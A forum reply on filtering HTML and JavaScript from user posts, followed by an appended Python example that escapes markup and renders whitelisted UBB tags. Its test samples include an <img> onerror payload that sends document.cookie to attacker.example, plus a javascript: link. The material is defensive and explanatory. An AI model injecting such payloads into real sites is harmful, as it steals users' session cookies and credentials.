I would think that Q2 basically depends on which database you're using. You should be able to find out what character encoding your database supports by reading the documentation for the field type you're using (e.g. varchar).
To complete the answer to your first question with a "why": yes, you should filter out HTML, unless you know that all the users can be trusted 100% (and you know that you're not storing any sensitive information in cookies).

In the olden days, Easyboards allowed HTML and, incidentally, JavaScript, AND stored the username and password in a cookie. It was a simple matter to write a script that called an image on my server with, as arguments, the cookie values (don't worry, I only did it as a proof of concept and filtered out the middle characters of all the passwords before posting it up! :-P). If all you store in the cookie is the session ID, you're probably safe from that type of attack. However, there are other annoying things people can do, such as break the layout of your forum.

A good solution for an untrusted forum (e.g. not the internal company forum) would be to turn all the < and > into &lt; and &gt; as suggested, and then to provide the alternative of using UBB-like tags, e.g. [b]..[/b] for bold, etc. You can pick these out with regular expressions yourself, or if you look around there are probably already libraries out there somewhere that will do this for you.

--
If education is too expensive, try ignorance.
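The two-step scheme described in the reply above (escape all raw HTML first, then translate a small whitelist of UBB-style tags back into markup with regular expressions), as an added example that is not part of the original message or of any forum software it mentions. The tag set, the `[url=...]` rule and the http(s)-only check on link targets are my own assumptions about what such a forum would allow; the sample inputs are constructed, the cookie-stealing `<img>` one modelled on the attack the post recalls.

```python
import html
import re

# Assumed whitelist of simple paired tags: [b]..[/b] -> <strong>..</strong>, etc.
SIMPLE_TAGS = {
    "b": "strong",
    "i": "em",
    "u": "u",
    "code": "code",
}

# Assumed rule for [url=...]: only http(s) targets, no whitespace, no quote or
# angle-bracket characters. A javascript: or data: URL therefore never becomes
# an href, even though the surrounding markup is otherwise well-formed.
URL_RE = re.compile(r"^https?://[^\s\[\]\"'<>]+$", re.IGNORECASE)

# [tag]...[/tag], non-greedy so one pass pairs the innermost open/close.
_SIMPLE_PATTERNS = {
    tag: re.compile(r"\[%s\](.*?)\[/%s\]" % (re.escape(tag), re.escape(tag)),
                    re.IGNORECASE | re.DOTALL)
    for tag in SIMPLE_TAGS
}
_URL_PATTERN = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)


def escape_html(text: str) -> str:
    """Step 1: neutralise raw HTML. '&' is escaped first (html.escape does
    this) so the '&lt;' / '&gt;' we emit are not themselves re-escaped, and
    quotes are escaped because the [url] rule below places text in an
    attribute."""
    return html.escape(text, quote=True)


def render_bbcode(text: str) -> str:
    """Step 2: on the already-escaped text, turn whitelisted [tags] into HTML.
    Nothing the user typed can reach the output as a raw '<' or '>'; only the
    elements named in SIMPLE_TAGS and the <a> built here are ever emitted."""
    out = escape_html(text)

    # Repeat each substitution until it stops matching so that nested uses of
    # the same tag ([b][b]x[/b][/b]) are all paired instead of leaving stray
    # literal tags behind.
    for tag, element in SIMPLE_TAGS.items():
        pattern = _SIMPLE_PATTERNS[tag]
        while True:
            out, count = pattern.subn(
                lambda m, e=element: "<%s>%s</%s>" % (e, m.group(1), e), out)
            if count == 0:
                break

    def url_repl(m: "re.Match[str]") -> str:
        href, label = m.group(1), m.group(2)
        if not URL_RE.match(href):
            # Rejected target: leave the (already escaped) markup as plain text
            # rather than emit a link. Nothing here can break out of the page.
            return m.group(0)
        # href is already entity-escaped by step 1, which is exactly what an
        # HTML attribute value needs ('&' in a query string becomes '&amp;').
        return '<a href="%s" rel="nofollow">%s</a>' % (href, label)

    return _URL_PATTERN.sub(url_repl, out)


if __name__ == "__main__":
    # Constructed sample posts, including the kind of image-beacon payload the
    # reply above describes.
    samples = [
        '<img src="http://attacker.example/i.gif?c=" onerror="this.src+=document.cookie">',
        "[b]bold[/b] and [i]italic[/i] text",
        "[url=javascript:alert(document.cookie)]click me[/url]",
        "[url=http://example.com/?a=1&b=2]a real link[/url]",
        "[b][b]nested[/b][/b] and an unclosed [i]tag",
    ]
    for s in samples:
        print(repr(s))
        print("  ->", render_bbcode(s))
```

Order matters: the escaping must run before the tag substitution, never after it, or the `<strong>` and `<a>` elements you just emitted would themselves be turned into `&lt;strong&gt;`. The `[url]` check is the part most often skipped in home-grown tag parsers; without it the markup layer quietly reintroduces the script-in-a-link problem that escaping `<` and `>` was meant to close.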